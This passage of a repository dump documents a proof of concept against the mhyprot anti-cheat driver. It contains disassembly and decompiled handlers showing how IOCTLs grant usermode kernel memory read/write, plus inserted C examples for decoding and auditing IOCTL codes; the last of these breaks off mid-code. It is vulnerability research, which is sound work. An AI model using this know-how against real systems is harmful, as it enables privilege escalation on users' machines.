PAGE:FFFFF800188CD818 shr rdx, 5
PAGE:FFFFF800188CD81C mov ecx, edx
PAGE:FFFFF800188CD81E mov rdx, r14
PAGE:FFFFF800188CD821 mov [r14], rcx
PAGE:FFFFF800188CD824 mov rcx, rdi
PAGE:FFFFF800188CD827 call sub_FFFFF800188C32B0
PAGE:FFFFF800188CD82C mov [rbp+30h], eax
PAGE:FFFFF800188CD82F mov rcx, [r14]
PAGE:FFFFF800188CD832 test eax, eax
PAGE:FFFFF800188CD834 js short loc_FFFFF800188CD853
PAGE:FFFFF800188CD836 lea r8, [rcx+rcx*2]
PAGE:FFFFF800188CD83A shl r8, 4
PAGE:FFFFF800188CD83E add r8, 8
PAGE:FFFFF800188CD842
PAGE:FFFFF800188CD842 loc_FFFFF800188CD842: ; CODE XREF: sub_FFFFF800188CD6E0+1FC↓j
PAGE:FFFFF800188CD842 mov rdx, r14
PAGE:FFFFF800188CD845 mov [rbp+38h], r8
PAGE:FFFFF800188CD849 mov rcx, rdi
PAGE:FFFFF800188CD84C call sub_FFFFF800188C75C0
PAGE:FFFFF800188CD851 jmp short loc_FFFFF800188CD85B
PAGE:FFFFF800188CD853 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD853
PAGE:FFFFF800188CD853 loc_FFFFF800188CD853: ; CODE XREF: sub_FFFFF800188CD6E0+154↑j
PAGE:FFFFF800188CD853 mov esi, 8
PAGE:FFFFF800188CD858 mov [rdi], rcx
PAGE:FFFFF800188CD85B
PAGE:FFFFF800188CD85B loc_FFFFF800188CD85B: ; CODE XREF: sub_FFFFF800188CD6E0+171↑j
PAGE:FFFFF800188CD85B ; sub_FFFFF800188CD6E0+208↓j
PAGE:FFFFF800188CD85B mov edx, 4746544Dh
PAGE:FFFFF800188CD860 mov rcx, r14
PAGE:FFFFF800188CD863 jmp loc_FFFFF800188CDA49
PAGE:FFFFF800188CD868 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD868
PAGE:FFFFF800188CD868 loc_FFFFF800188CD868: ; CODE XREF: sub_FFFFF800188CD6E0+EE↑j
PAGE:FFFFF800188CD868 cmp ecx, 82104000h
PAGE:FFFFF800188CD86E jnz short loc_FFFFF800188CD8ED
PAGE:FFFFF800188CD870 cmp r8d, 28h ; '('
PAGE:FFFFF800188CD874 jb loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD87A cmp esi, 20h ; ' '
PAGE:FFFFF800188CD87D jb loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD883 test rdi, rdi
PAGE:FFFFF800188CD886 jz loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD88C mov r8d, 4746544Dh ; Tag
PAGE:FFFFF800188CD892 mov rdx, rsi ; NumberOfBytes
PAGE:FFFFF800188CD895 mov ecx, 1 ; PoolType
PAGE:FFFFF800188CD89A call cs:ExAllocatePoolWithTag
PAGE:FFFFF800188CD8A0 mov r14, rax
PAGE:FFFFF800188CD8A3 lea rcx, [rsi-4]
PAGE:FFFFF800188CD8A7 mov rax, 0AAAAAAAAAAAAAAABh
PAGE:FFFFF800188CD8B1 mul rcx
PAGE:FFFFF800188CD8B4 mov rcx, rdi
PAGE:FFFFF800188CD8B7 shr rdx, 4
PAGE:FFFFF800188CD8BB mov [r14], edx
PAGE:FFFFF800188CD8BE mov rdx, r14
PAGE:FFFFF800188CD8C1 call sub_FFFFF800188C377C
PAGE:FFFFF800188CD8C6 mov [rbp+30h], eax
PAGE:FFFFF800188CD8C9 mov ecx, [r14]
PAGE:FFFFF800188CD8CC test eax, eax
PAGE:FFFFF800188CD8CE js short loc_FFFFF800188CD8E1
PAGE:FFFFF800188CD8D0 lea rcx, [rcx+rcx*2]
PAGE:FFFFF800188CD8D4 lea r8, ds:4[rcx*8]
PAGE:FFFFF800188CD8DC jmp loc_FFFFF800188CD842
PAGE:FFFFF800188CD8E1 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD8E1
PAGE:FFFFF800188CD8E1 loc_FFFFF800188CD8E1: ; CODE XREF: sub_FFFFF800188CD6E0+1EE↑j
PAGE:FFFFF800188CD8E1 mov esi, 4
PAGE:FFFFF800188CD8E6 mov [rdi], ecx
PAGE:FFFFF800188CD8E8 jmp loc_FFFFF800188CD85B
PAGE:FFFFF800188CD8ED ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD8ED
PAGE:FFFFF800188CD8ED loc_FFFFF800188CD8ED: ; CODE XREF: sub_FFFFF800188CD6E0+18E↑j
PAGE:FFFFF800188CD8ED cmp ecx, 82094000h
PAGE:FFFFF800188CD8F3 jnz short loc_FFFFF800188CD8FD
PAGE:FFFFF800188CD8F5 and dword ptr [rdi], 0
PAGE:FFFFF800188CD8F8 jmp loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD8FD ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD8FD
PAGE:FFFFF800188CD8FD loc_FFFFF800188CD8FD: ; CODE XREF: sub_FFFFF800188CD6E0+213↑j
PAGE:FFFFF800188CD8FD cmp ecx, 80034000h ; MHYPROT_IOCTL_INITIALIZE
PAGE:FFFFF800188CD903 jnz short loc_FFFFF800188CD984
PAGE:FFFFF800188CD905 cmp r8d, 10h
PAGE:FFFFF800188CD909 jnz loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD90F mov rax, 0EBBAAEF4FFF89042h
PAGE:FFFFF800188CD919 xor [rdi+8], rax
PAGE:FFFFF800188CD91D mov rax, [rdi+8]
PAGE:FFFFF800188CD921 xor [rdi], rax
PAGE:FFFFF800188CD924 cmp dword ptr [rdi+4], 0BAEBAEECh
PAGE:FFFFF800188CD92B jnz loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD931 mov ecx, [rdi]
PAGE:FFFFF800188CD933 call sub_FFFFF800188C51A8
PAGE:FFFFF800188CD938 cmp dword ptr cs:qword_FFFFF800188CA108, 0
PAGE:FFFFF800188CD93F jnz short loc_FFFFF800188CD97D
PAGE:FFFFF800188CD941 mov rdx, [rdi+8]
PAGE:FFFFF800188CD945 lea rcx, xmmword_FFFFF800188CA0E8
PAGE:FFFFF800188CD94C call sub_FFFFF800188C301C
PAGE:FFFFF800188CD951 mov ebx, 7
PAGE:FFFFF800188CD956
PAGE:FFFFF800188CD956 loc_FFFFF800188CD956: ; CODE XREF: sub_FFFFF800188CD6E0+293↓j
PAGE:FFFFF800188CD956 lea rcx, xmmword_FFFFF800188CA0E8
PAGE:FFFFF800188CD95D call sub_FFFFF800188C2EB0
PAGE:FFFFF800188CD962 mov [rdi], rax
PAGE:FFFFF800188CD965 mov dword ptr cs:qword_FFFFF800188CA108, 1
PAGE:FFFFF800188CD96F sub rbx, 1
PAGE:FFFFF800188CD973 jnz short loc_FFFFF800188CD956
PAGE:FFFFF800188CD975 lea esi, [rbx+8]
PAGE:FFFFF800188CD978 jmp loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD97D ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD97D
PAGE:FFFFF800188CD97D loc_FFFFF800188CD97D: ; CODE XREF: sub_FFFFF800188CD6E0+25F↑j
PAGE:FFFFF800188CD97D xor esi, esi
PAGE:FFFFF800188CD97F jmp loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD984 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD984
PAGE:FFFFF800188CD984 loc_FFFFF800188CD984: ; CODE XREF: sub_FFFFF800188CD6E0+223↑j
PAGE:FFFFF800188CD984 cmp ecx, 81134000h
PAGE:FFFFF800188CD98A jz loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD990 cmp ecx, 81144000h
PAGE:FFFFF800188CD996 jnz short loc_FFFFF800188CD9DE
PAGE:FFFFF800188CD998 mov ecx, [rdi]
PAGE:FFFFF800188CD99A lea rdx, [rsp+1C8h+var_198]
PAGE:FFFFF800188CD99F call sub_FFFFF800188C6654
PAGE:FFFFF800188CD9A4 test eax, eax
PAGE:FFFFF800188CD9A6 jns short loc_FFFFF800188CD9B2
PAGE:FFFFF800188CD9A8 mov esi, 4
PAGE:FFFFF800188CD9AD jmp loc_FFFFF800188CD7C1
PAGE:FFFFF800188CD9B2 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD9B2
PAGE:FFFFF800188CD9B2 loc_FFFFF800188CD9B2: ; CODE XREF: sub_FFFFF800188CD6E0+2C6↑j
PAGE:FFFFF800188CD9B2 lea esi, [rax+rax*2]
PAGE:FFFFF800188CD9B5 movsxd rcx, eax
PAGE:FFFFF800188CD9B8 shl esi, 3
PAGE:FFFFF800188CD9BB test eax, eax
PAGE:FFFFF800188CD9BD jle loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD9C3 lea r8, [rcx+rcx*2]
PAGE:FFFFF800188CD9C7 mov rcx, rdi
PAGE:FFFFF800188CD9CA shl r8, 3
PAGE:FFFFF800188CD9CE lea rdx, [rsp+1C8h+var_198]
PAGE:FFFFF800188CD9D3 and r8, 0FFFFFFFFFFFFFFF8h
PAGE:FFFFF800188CD9D7 call sub_FFFFF800188C75C0
PAGE:FFFFF800188CD9DC jmp short loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD9DE ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD9DE
PAGE:FFFFF800188CD9DE loc_FFFFF800188CD9DE: ; CODE XREF: sub_FFFFF800188CD6E0+2B6↑j
PAGE:FFFFF800188CD9DE and [rsp+1C8h+P], 0
PAGE:FFFFF800188CD9E7 lea rax, [rsp+1C8h+arg_8]
PAGE:FFFFF800188CD9EF and [rsp+1C8h+arg_8], 0
PAGE:FFFFF800188CD9F7 lea r9, [rsp+1C8h+P]
PAGE:FFFFF800188CD9FF mov rdx, rdi
PAGE:FFFFF800188CDA02 mov [rsp+1C8h+var_1A8], rax
PAGE:FFFFF800188CDA07 call sub_FFFFF800188CD000
PAGE:FFFFF800188CDA0C test al, al
PAGE:FFFFF800188CDA0E jz short loc_FFFFF800188CDA4F
PAGE:FFFFF800188CDA10 mov eax, [rsp+1C8h+arg_8]
PAGE:FFFFF800188CDA17 cmp esi, eax
PAGE:FFFFF800188CDA19 mov rbx, [rsp+1C8h+P]
PAGE:FFFFF800188CDA21 cmovb eax, esi
PAGE:FFFFF800188CDA24 mov [rsp+1C8h+arg_8], eax
PAGE:FFFFF800188CDA2B test rbx, rbx
PAGE:FFFFF800188CDA2E jz short loc_FFFFF800188CDA4F
PAGE:FFFFF800188CDA30 test eax, eax
PAGE:FFFFF800188CDA32 jz short loc_FFFFF800188CDA4F
PAGE:FFFFF800188CDA34 mov r8d, eax
PAGE:FFFFF800188CDA37 mov rdx, rbx
PAGE:FFFFF800188CDA3A mov rcx, rdi
PAGE:FFFFF800188CDA3D mov esi, eax
PAGE:FFFFF800188CDA3F call sub_FFFFF800188C75C0
PAGE:FFFFF800188CDA44 xor edx, edx ; Tag
PAGE:FFFFF800188CDA46 mov rcx, rbx ; P
PAGE:FFFFF800188CDA49
PAGE:FFFFF800188CDA49 loc_FFFFF800188CDA49: ; CODE XREF: sub_FFFFF800188CD6E0+183↑j
PAGE:FFFFF800188CDA49 call cs:ExFreePoolWithTag
PAGE:FFFFF800188CDA4F
PAGE:FFFFF800188CDA4F loc_FFFFF800188CDA4F: ; CODE XREF: sub_FFFFF800188CD6E0+6B↑j
PAGE:FFFFF800188CDA4F ; sub_FFFFF800188CD6E0+81↑j ...
PAGE:FFFFF800188CDA4F mov eax, esi
PAGE:FFFFF800188CDA51 xor edx, edx ; PriorityBoost
PAGE:FFFFF800188CDA53 mov [rbp+38h], rax
PAGE:FFFFF800188CDA57 mov rcx, rbp ; Irp
PAGE:FFFFF800188CDA5A and dword ptr [rbp+30h], 0
PAGE:FFFFF800188CDA5E call cs:IofCompleteRequest
PAGE:FFFFF800188CDA64 lea r11, [rsp+1C8h+var_18]
PAGE:FFFFF800188CDA6C xor eax, eax
PAGE:FFFFF800188CDA6E mov rbx, [r11+20h]
PAGE:FFFFF800188CDA72 mov rbp, [r11+38h]
PAGE:FFFFF800188CDA76 mov rsp, r11
PAGE:FFFFF800188CDA79 pop r14
PAGE:FFFFF800188CDA7B pop rdi
PAGE:FFFFF800188CDA7C pop rsi
PAGE:FFFFF800188CDA7D retn
PAGE:FFFFF800188CDA7D sub_FFFFF800188CD6E0 endp
================================================
FILE: LICENSE
================================================
MIT License
Copyright (c) 2020 Kento Oki
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: README.md
================================================



# evil-mhyprot-cli
A PoC for the vulnerable driver "mhyprot" that allows us to read/write kernel and user memory from usermode.
### Static Library is here: [libmhyprot](https://github.com/kkent030315/libmhyprot)
# Overview
What we can do with this CLI is as follows:
- Read/Write any kernel memory with kernel privilege from usermode
- Read/Write any user memory with kernel privilege from usermode
- All operations are executed with kernel-level privilege (ring-0) by the vulnerable driver
Also:
- Administrator privilege is only needed if the service is not yet running
- Therefore we can execute the commands above as a normal user (without administrator privilege)
---
`mhyprot` is an anti-cheat kernel-mode driver used in [`Genshin Impact`](https://genshin.mihoyo.com/ja).
The driver has vulnerable `IOCTL` commands that allow us to execute `MmCopyVirtualMemory` and `memcpy` (in the kernel!) from ring-3 (usermode).

# Impact
Investigating
# Requirements
- Any version of Windows x64 that the driver works on
- Administrator privilege is not required if the service is already running
Tested on:
- Windows10 x64 1903
- Windows7 x64 6.1
- Windows8.1 x64 6.3
# Usage
```
bin.exe [TargetProcess] -options
```
The following options are available as of now:
- `t`
  - Perform tests
- `d`
  - Print debug info
- `s`
  - Print seedmap
# Analysis and Proofs
> The document(s) below are still being written, so please forgive in advance any mistakes I made.
## IOCTL Handler Functions
So what I did was reverse engineer the IOCTL handling functionality.
Since the IOCTL functions and their functionality are packed, reverse engineering them is harder than average,
but I can still easily find the function registered at `DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]`, since the IOCTL handler must call `IoCompleteRequest` or `IofCompleteRequest`, which are exported by `ntoskrnl`.
(Btw `IoCompleteRequest` is just a wrapper of `IofCompleteRequest`)

Since mhyprot imports `IofCompleteRequest`, follow its xrefs and we will see there are many IOCTL handlers.
Concretely, I found two big subroutines in the packed segment.
I've added them to [this repo](IDA) as binary since they're too big.
- [sub_FFFFF800188CD000](IDA/sub_FFFFF800188CD000.txt)
- -> [Pseudocode](https://github.com/kkent030315/evil-mhyprot-cli/blob/main/IDA/FUN_0001d000.cpp)
- [sub_FFFFF800188CD6E0](IDA/sub_FFFFF800188CD6E0.txt)
- -> [Pseudocode](https://github.com/kkent030315/evil-mhyprot-cli/blob/main/IDA/FUN_0001d6e0.cpp)
I will keep this updated if I find more subroutines.
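When auditing a dispatcher like `sub_FFFFF800188CD6E0`, a first triage step is to split each compared constant into its `CTL_CODE` fields. The following is an added example, not code from this repository; the struct, function and flag names are this example's own, and the constants are the `cmp` operands copied from the listing.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* CTL_CODE layout from the WDK headers:
 * DeviceType[31:16] | RequiredAccess[15:14] | Function[13:2] | Method[1:0] */
typedef struct {
    uint32_t code;
    uint16_t device_type;
    uint8_t  access;   /* 0 any, 1 read, 2 write, 3 read|write */
    uint16_t function;
    uint8_t  method;   /* 0 buffered, 1 in-direct, 2 out-direct, 3 neither */
} ioctl_fields;

/* Audit flags (names are this example's own, not WDK identifiers). */
enum {
    AUDIT_VENDOR_DEVICE_TYPE = 1u << 0, /* DeviceType >= 0x8000: vendor-defined range    */
    AUDIT_RESERVED_FUNCTION  = 1u << 1, /* Function < 0x800: range reserved for Microsoft */
    AUDIT_NO_WRITE_ACCESS    = 1u << 2, /* I/O manager does not demand FILE_WRITE_ACCESS  */
    AUDIT_METHOD_NEITHER     = 1u << 3  /* raw user pointers are handed to the driver     */
};

/* cmp operands copied from the sub_FFFFF800188CD6E0 listing on this page. */
static const uint32_t LISTING_CODES[] = {
    0x80104000u, 0x80134000u, 0x82054000u, 0x83024000u,
    0x83074000u, 0x83064000u, 0x82074000u, 0x82104000u,
    0x82094000u, 0x80034000u, 0x81134000u, 0x81144000u
};
#define LISTING_COUNT (sizeof LISTING_CODES / sizeof LISTING_CODES[0])

ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;
    f.code        = code;
    f.device_type = (uint16_t)(code >> 16);
    f.access      = (uint8_t)((code >> 14) & 0x3u);
    f.function    = (uint16_t)((code >> 2) & 0xFFFu);
    f.method      = (uint8_t)(code & 0x3u);
    return f;
}

unsigned audit_ioctl(const ioctl_fields *f)
{
    unsigned flags = 0;
    if (f->device_type >= 0x8000u) flags |= AUDIT_VENDOR_DEVICE_TYPE;
    if (f->function < 0x800u)      flags |= AUDIT_RESERVED_FUNCTION;
    if ((f->access & 0x2u) == 0)   flags |= AUDIT_NO_WRITE_ACCESS;
    if (f->method == 3u)           flags |= AUDIT_METHOD_NEITHER;
    return flags;
}

/* Number of different DeviceType values in a set of codes (O(n^2), n is tiny). */
size_t count_distinct_device_types(const uint32_t *codes, size_t n)
{
    size_t distinct = 0;
    for (size_t i = 0; i < n; i++) {
        int seen = 0;
        for (size_t j = 0; j < i; j++)
            if ((codes[j] >> 16) == (codes[i] >> 16)) { seen = 1; break; }
        if (!seen) distinct++;
    }
    return distinct;
}

static const char *method_name(uint8_t m)
{
    static const char *names[] = {
        "METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"
    };
    return names[m & 0x3u];
}

static const char *access_name(uint8_t a)
{
    static const char *names[] = {
        "FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
        "FILE_READ_ACCESS|FILE_WRITE_ACCESS"
    };
    return names[a & 0x3u];
}

int main(void)
{
    printf("%-10s %-6s %-18s %-5s %-16s %s\n",
           "code", "devtype", "access", "func", "method", "flags");
    for (size_t i = 0; i < LISTING_COUNT; i++) {
        ioctl_fields f = decode_ioctl(LISTING_CODES[i]);
        printf("0x%08X 0x%04X %-18s 0x%03X %-16s 0x%X\n",
               (unsigned)f.code, (unsigned)f.device_type, access_name(f.access),
               (unsigned)f.function, method_name(f.method), audit_ioctl(&f));
    }
    printf("distinct device types: %zu of %zu codes\n",
           count_distinct_device_types(LISTING_CODES, LISTING_COUNT),
           (size_t)LISTING_COUNT);
    return 0;
}
```

Every constant from the listing decodes to function 0, `METHOD_BUFFERED` and `FILE_READ_ACCESS`, with the command carried in the DeviceType field. The I/O manager therefore asks for nothing beyond read access on the device handle, and any further gating rests on the device object's ACL and the handler's own checks.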
## Driver Initialization
The `MHYPROT_IOCTL_INITIALIZE` that I defined in [mhyprot.hpp#L18](src/mhyprot.hpp#L18) can be found as follows:
```cpp
PAGE:FFFFF800188CD8FD loc_FFFFF800188CD8FD: ; CODE XREF: sub_FFFFF800188CD6E0+213↑j
PAGE:FFFFF800188CD8FD cmp ecx, 80034000h ; MHYPROT_IOCTL_INITIALIZE
PAGE:FFFFF800188CD903 jnz short loc_FFFFF800188CD984
PAGE:FFFFF800188CD905 cmp r8d, 10h
PAGE:FFFFF800188CD909 jnz loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD90F mov rax, 0EBBAAEF4FFF89042h // <- _m_002
PAGE:FFFFF800188CD919 xor [rdi+8], rax
PAGE:FFFFF800188CD91D mov rax, [rdi+8]
PAGE:FFFFF800188CD921 xor [rdi], rax
PAGE:FFFFF800188CD924 cmp dword ptr [rdi+4], 0BAEBAEECh // <- _m_001
PAGE:FFFFF800188CD92B jnz loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD931 mov ecx, [rdi]
PAGE:FFFFF800188CD933 call sub_FFFFF800188C51A8
PAGE:FFFFF800188CD938 cmp dword ptr cs:qword_FFFFF800188CA108, 0
PAGE:FFFFF800188CD93F jnz short loc_FFFFF800188CD97D
PAGE:FFFFF800188CD941 mov rdx, [rdi+8]
PAGE:FFFFF800188CD945 lea rcx, xmmword_FFFFF800188CA0E8
PAGE:FFFFF800188CD94C call sub_FFFFF800188C301C // <-
PAGE:FFFFF800188CD951 mov ebx, 7
```
And `sub_FFFFF800188C301C` looks like:
```cpp
.text:FFFFF800188C301C ; =============== S U B R O U T I N E =======================================
.text:FFFFF800188C301C
.text:FFFFF800188C301C
.text:FFFFF800188C301C sub_FFFFF800188C301C proc near ; CODE XREF: sub_FFFFF800188CD6E0+26C↓p
.text:FFFFF800188C301C ; DATA XREF: .upx0:FFFFF800189F2BA8↓o
.text:FFFFF800188C301C
.text:FFFFF800188C301C arg_0 = qword ptr 8
.text:FFFFF800188C301C
.text:FFFFF800188C301C test rcx, rcx
.text:FFFFF800188C301F jz locret_FFFFF800188C30B4
.text:FFFFF800188C3025 mov [rsp+arg_0], rbx
.text:FFFFF800188C302A push rdi
.text:FFFFF800188C302B sub rsp, 20h
.text:FFFFF800188C302F xor eax, eax
.text:FFFFF800188C3031 mov rdi, rdx
.text:FFFFF800188C3034 mov [rcx], rax
.text:FFFFF800188C3037 mov rbx, rcx
.text:FFFFF800188C303A mov [rcx+8], rax
.text:FFFFF800188C303E mov edx, 9C0h ; NumberOfBytes
.text:FFFFF800188C3043 xor ecx, ecx ; PoolType
.text:FFFFF800188C3045 call cs:ExAllocatePool
.text:FFFFF800188C304B xor edx, edx
.text:FFFFF800188C304D mov r8d, 9C0h
.text:FFFFF800188C3053 mov rcx, rax
.text:FFFFF800188C3056 mov [rbx], rax
.text:FFFFF800188C3059 call sub_FFFFF800188C7900
.text:FFFFF800188C305E mov rax, [rbx]
.text:FFFFF800188C3061 mov r9d, 1
.text:FFFFF800188C3067 mov [rbx+0Ch], r9d
.text:FFFFF800188C306B mov [rax], rdi
.text:FFFFF800188C306E mov [rbx+8], r9d
.text:FFFFF800188C3072
.text:FFFFF800188C3072 loc_FFFFF800188C3072: ; CODE XREF: sub_FFFFF800188C301C+8C↓j
.text:FFFFF800188C3072 movsxd r8, dword ptr [rbx+8]
.text:FFFFF800188C3076 mov rdx, [rbx]
.text:FFFFF800188C3079 mov rax, [rdx+r8*8-8]
.text:FFFFF800188C307E mov rcx, rax
.text:FFFFF800188C3081 shr rcx, 3Eh
.text:FFFFF800188C3085 xor rcx, rax
.text:FFFFF800188C3088 mov rax, 5851F42D4C957F2Dh
.text:FFFFF800188C3092 imul rcx, rax
.text:FFFFF800188C3096 add rcx, r8
.text:FFFFF800188C3099 mov [rdx+r8*8], rcx
.text:FFFFF800188C309D add [rbx+8], r9d
.text:FFFFF800188C30A1 cmp dword ptr [rbx+8], 138h
.text:FFFFF800188C30A8 jl short loc_FFFFF800188C3072
.text:FFFFF800188C30AA mov rbx, [rsp+28h+arg_0]
.text:FFFFF800188C30AF add rsp, 20h
.text:FFFFF800188C30B3 pop rdi
.text:FFFFF800188C30B4
.text:FFFFF800188C30B4 locret_FFFFF800188C30B4: ; CODE XREF: sub_FFFFF800188C301C+3↑j
.text:FFFFF800188C30B4 retn
.text:FFFFF800188C30B4 sub_FFFFF800188C301C endp
```
## A Way of Read/Write Specific Process Memory
mhyprot eventually calls `MmCopyVirtualMemory` through a wrapper defined as follows:
```cpp
__int64 __fastcall sub_FFFFF800188C3EB8(struct _EPROCESS *a1, _DWORD *a2, __int64 a3)
{
  __int64 v3; // rbp
  _DWORD *v4; // rdi
  struct _EPROCESS *v5; // rbx
  PEPROCESS v6; // rsi
  char v8; // [rsp+28h] [rbp-20h]
  v3 = a3;
  v4 = a2;
  v5 = a1;
  if ( *a2 == 1 )
  {
    v6 = IoGetCurrentProcess();
  }
  else
  {
    v6 = a1;
    v5 = IoGetCurrentProcess();
  }
  v8 = 0;
  return MmCopyVirtualMemory(v6, *((_QWORD *)v4 + 3), v5, *((_QWORD *)v4 + 2), (unsigned int)v4[8], v8, v3);
}
```
Called by:
```cpp
__int64 __fastcall sub_FFFFF800188C3F2C(_DWORD *a1_rw_request, __int64 a2_returnsize, __int64 a3)
{
  __int64 v3_returnsize; // rsi
  _DWORD *v4_rw_request; // rbx
  __int64 v5_processid; // rcx
  bool v6_ntstatus_lookup_success_bool; // di
  unsigned int v8_ntstatus; // ebx
  PVOID Object; // [rsp+40h] [rbp+8h]
  v3_returnsize = a2_returnsize;
  v4_rw_request = a1_rw_request;
  v5_processid = (unsigned int)a1_rw_request[2];
  Object = 0i64;
  v6_ntstatus_lookup_success_bool = (int)PsLookupProcessByProcessId(v5_processid, &Object, a3) >= 0;// NT_SUCCESS
  if ( !Object )
    return 3221225473i64;
  v8_ntstatus = sub_FFFFF800188C3EB8((struct _EPROCESS *)Object, v4_rw_request, v3_returnsize);
  if ( v6_ntstatus_lookup_success_bool )
    ObfDereferenceObject(Object);
  return v8_ntstatus;
}
```
Called by:
```cpp
bool __fastcall sub_FFFFF800188C4214(_DWORD *a1_rw_request, _DWORD *a2_returnsize, __int64 a3)
{
_DWORD *v3_returnsize; // rbx
int v5_ntstatus; // [rsp+20h] [rbp-18h]
__int64 v6_returnsize; // [rsp+50h] [rbp+18h]
v3_returnsize = a2_returnsize;
v6_returnsize = 0i64;
v5_ntstatus = sub_FFFFF800188C3F2C(a1_rw_request, (__int64)&v6_returnsize, a3);
*v3_returnsize = v6_returnsize;
return v5_ntstatus == 0; // NT_SUCCESS(v5_ntstatus)
}
```
Finally we are at the root of the tree:
```cpp
PAGE:FFFFF800188CD303 loc_FFFFF800188CD303: ; CODE XREF: sub_FFFFF800188CD000+2C7↑j
PAGE:FFFFF800188CD303 and dword ptr [rbp+1D0h+arg_20], 0
PAGE:FFFFF800188CD30A lea rdx, [rbp+1D0h+arg_20]
PAGE:FFFFF800188CD311 mov rcx, [rsp+30h]
PAGE:FFFFF800188CD316 call sub_FFFFF800188C4214 // <- Here
PAGE:FFFFF800188CD31B jmp loc_FFFFF800188CD21C
```
Call map:

## A Way of Read Kernel Memory
There are many IOCTL commands; the one I defined as `MHYPROT_IOCTL_READ_KERNEL_MEMORY` in [mhyprot.hpp#L19](src/mhyprot.hpp#L19) can be found as follows:
```cpp
PAGE:FFFFF800188CD7A9 loc_FFFFF800188CD7A9: ; CODE XREF: sub_FFFFF800188CD6E0+BA↑j
PAGE:FFFFF800188CD7A9 cmp ecx, 83064000h ; MHYPROT_IOCTL_READ_KERNEL_MEMORY
PAGE:FFFFF800188CD7AF jnz short loc_FFFFF800188CD7C8
PAGE:FFFFF800188CD7B1 mov rdx, [rdi]
PAGE:FFFFF800188CD7B4 lea rcx, [rdi+4]
PAGE:FFFFF800188CD7B8 mov r8d, [rdi+8]
PAGE:FFFFF800188CD7BC call sub_FFFFF800188C63A8 // <-
```
And `sub_FFFFF800188C63A8` looks like this:
```cpp
.text:FFFFF800188C63A8 sub_FFFFF800188C63A8 proc near ; CODE XREF: sub_FFFFF800188CD6E0+DC↓p
.text:FFFFF800188C63A8 ; DATA XREF: .upx0:FFFFF800189F2EE4↓o
.text:FFFFF800188C63A8
.text:FFFFF800188C63A8 arg_0 = qword ptr 8
.text:FFFFF800188C63A8 arg_8 = qword ptr 10h
.text:FFFFF800188C63A8
.text:FFFFF800188C63A8 mov [rsp+arg_0], rbx
.text:FFFFF800188C63AD mov [rsp+arg_8], rsi
.text:FFFFF800188C63B2 push rdi
.text:FFFFF800188C63B3 sub rsp, 20h
.text:FFFFF800188C63B7 mov edi, r8d
.text:FFFFF800188C63BA mov rbx, rdx
.text:FFFFF800188C63BD mov rsi, rcx
.text:FFFFF800188C63C0 test rdx, rdx
.text:FFFFF800188C63C3 jz short loc_FFFFF800188C63F2
.text:FFFFF800188C63C5 test r8d, r8d
.text:FFFFF800188C63C8 jz short loc_FFFFF800188C63F2
.text:FFFFF800188C63CA mov rax, cs:MmHighestUserAddress
.text:FFFFF800188C63D1 cmp rdx, [rax]
.text:FFFFF800188C63D4 jb short loc_FFFFF800188C63F2
.text:FFFFF800188C63D6 mov r8d, edi
.text:FFFFF800188C63D9 xor edx, edx
.text:FFFFF800188C63DB call sub_FFFFF800188C7900
.text:FFFFF800188C63E0 mov r8d, edi
.text:FFFFF800188C63E3 mov rdx, rsi
.text:FFFFF800188C63E6 mov rcx, rbx
.text:FFFFF800188C63E9 call sub_FFFFF800188C3DD8
.text:FFFFF800188C63EE xor eax, eax
.text:FFFFF800188C63F0 jmp short loc_FFFFF800188C63F5
```
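The gate that `sub_FFFFF800188C63A8` applies before it copies, modelled in user-mode C next to a stricter variant. This is an added example, not code from this repository or from the driver. The `hardened_gate` policy, the `region` type, the size cap and every sample address are assumptions constructed for illustration; the copy routine `sub_FFFFF800188C3DD8` is not shown in this section and is not modelled.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed sample: the value *MmHighestUserAddress usually holds on x64. */
#define SAMPLE_HIGHEST_USER 0x00007FFFFFFEFFFFull

/* CTL_CODE layout: DeviceType[31:16] | Access[15:14] | Function[13:2] | Method[1:0]. */
typedef struct {
    uint32_t device_type;
    uint32_t access;
    uint32_t function;
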